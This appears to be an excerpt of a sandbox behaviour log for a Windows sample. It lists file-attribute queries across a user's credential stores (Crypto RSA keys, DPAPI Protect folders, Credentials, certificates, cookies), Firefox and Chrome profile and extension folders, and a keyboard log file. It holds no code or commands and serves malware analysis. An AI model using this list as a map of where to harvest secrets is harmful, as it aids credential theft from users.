| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1534390919-4215197118-2202912847-1000 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Document Building Blocks | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Document Building Blocks\1033 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Excel | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Excel\XLSTART | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\IME12 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\IMJP10 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\IMJP12 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\IMJP8_1 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\IMJP9_0 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\UserData | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\0FHKRMGG | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\34YFITI6 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\4ERT46Z6 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\5XG08RN1 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\MMC | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\MS Project | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\MS Project\12 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\MS Project\12\1033 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Network | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Network\Connections | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Network\Connections\Pbk | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Office | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Office\Recent | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Outlook | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Proof | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Protect | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Protect\S-1-5-21-1534390919-4215197118-2202912847-1000 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Protect\S-1-5-21-3111613574-2524581245-2586426736-500 | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Publisher | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Speech | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Speech\Files | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Speech\Files\UserLexicons | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\SystemCertificates | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\SystemCertificates\My | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Templates | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\UProof | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Cookies | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Cookies\Low | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\IECompatCache | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\IECompatCache\Low | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\IETldCache | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\IETldCache\Low | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Libraries | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Network Shortcuts | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Printer Shortcuts | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\PrivacIE | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\PrivacIE\Low | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Recent | type = file_attributes |
|
3 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\SendTo | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Templates | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Windows\Themes | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Word | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Microsoft\Word\STARTUP | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Extensions | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Crash Reports | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\bookmarkbackups | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\indexedDB | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\indexedDB\moz-safe-about+home | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\indexedDB\moz-safe-about+home\idb | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\minidumps | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\Mozilla\Firefox\Profiles\p7ap74gw.default\webapps | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ms | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\nl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\no | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\pl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\pt_BR | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\pt_PT | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ro | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\ru | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\sk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\sl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\sr | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\sv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\th | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\tr | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\uk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\vi | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_CN | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_TW | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_metadata | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0 | type = file_attributes |
|
2 | |
| Get Info | C:\ProgramData\Keyboard\17102017_012722.log | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\af | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\am | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ar | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\az | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bg | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\bn | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ca | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\cs | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\da | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\de | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\el | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_GB | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\en_US | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\es_419 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\et | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\eu | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fa | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fi | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fil | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\fr_CA | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\gu | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hi | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hr | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hu | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\hy | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\id | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\is | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\it | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\iw | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ja | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ka | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\km | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\kn | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ko | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lo | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lt | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\lv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mn | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\mr | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ms | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ne | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\nl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\no | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_BR | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\pt_PT | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ro | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ru | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\si | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sk | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sl | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sr | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sv | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\sw | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\ta | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\te | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_0\_locales\th | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Credentials | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Event Viewer | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds\Microsoft Feeds~ | type = file_attributes |
|
2 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~ | type = file_attributes |
|
2 | |
